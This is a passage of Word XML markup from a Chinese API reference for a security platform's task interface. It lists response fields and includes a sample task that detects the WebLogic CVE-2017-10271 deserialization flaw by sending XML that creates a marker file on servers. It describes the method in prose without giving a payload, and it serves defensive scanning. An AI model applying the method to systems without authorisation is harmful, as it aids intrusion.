      <w:tr w:rsidR="00497C54" w14:paraId="22DB0E1B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D92EA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73DF1E78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A0DA14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38A1E380" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B8D74F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7628BFB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="144F133E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>总任务数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35A18542" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="获取某一个任务的详细信息"/>
      <w:bookmarkEnd w:id="195"/>
      <w:r>
        <w:t>获取某一个任务的详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10821410" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/fastjob/task/{taskId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948708B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B127052" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6BBBE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/fastjob/task/0478ee5024763edc6d3c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19136229" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A973F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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0478ee5024763edc6d3c"</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eblogic &lt; 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"category"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"安全检测"</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漏洞描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>检测过程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>1.首先获取weblogic的kb,进行遍历，获取其中的servers字段后，再进行一次遍历一遍获取服务器监听的ip和端口信息，将每一个server组合成一个新的数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2.遍历每一个server，获取其中的proto(协议类型)、ip、port,其中先对ip地址进行处理(weblogic 10.3.4后为ipv6地址)，然后组合成url,并往url发送xml数据。根据当前时间戳生成一个文件名，xml数据的作用则是创建该文件。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3.遍历根据时间戳生成的文件名数组,判断其是否存在。如果文件存在，则上报存在漏洞。否则上报不存在漏洞 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>使用场景：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>可通过该脚本进行快速识别哪些主机上存在Weblogic服务然后判断是否存在反序列化漏洞，并将存在漏洞的主机上报。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"riskInfo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>漏洞检测结果基于已有Weblogic KB数据进行漏洞存在性判断，若您在是在刚刚修复完成漏洞后进行检测，则需要先更新数据依赖后再执行该检测脚本获取最新漏洞检测结果。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"createdTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-05-30 09:42:42"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"updatedTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-05-30 09:42:42"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"inputSchema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outputSchemas"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1D577"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701"/>
        <w:gridCol w:w="3220"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="012E17F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EF72C2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B6643B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D409202" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22D82743" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605B26C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EB0F96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC1BF64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2492369E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5966F733" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E2652C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F4210FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速任务名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E7B76CA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1845FF2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="505B2887" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542EB250" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D93F516" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0188E10E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B2E7601" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4071ECBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务概述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EBAC8F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602E3272" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>riskInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67521727" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="534F27E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6BDF2B23" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EBCBC30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createdTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="298C856F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EE7C0E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DF229FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B86CEC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DB7AC3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A579B6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C187746" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E41D21D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>inputSchemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E265808" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Collection&lt;TaskInputSchema&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000C1F46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>输入参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6688E033" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01A4B724" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>outputSchemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="271280D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Collection&lt;TaskOutputSchema&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE4E098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>输出参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C0DF6D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TaskInputSchema说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="295B315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EC3138F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD2280C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755718B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37507C47" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A7FC35F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0276F047" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27EC8253" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46B8CA4F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25BC7D45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B1E92DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF4F71B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06125197" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A360A26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4630184A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E20A979" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必须</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="583CA16A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D0BE0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>defaultValue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
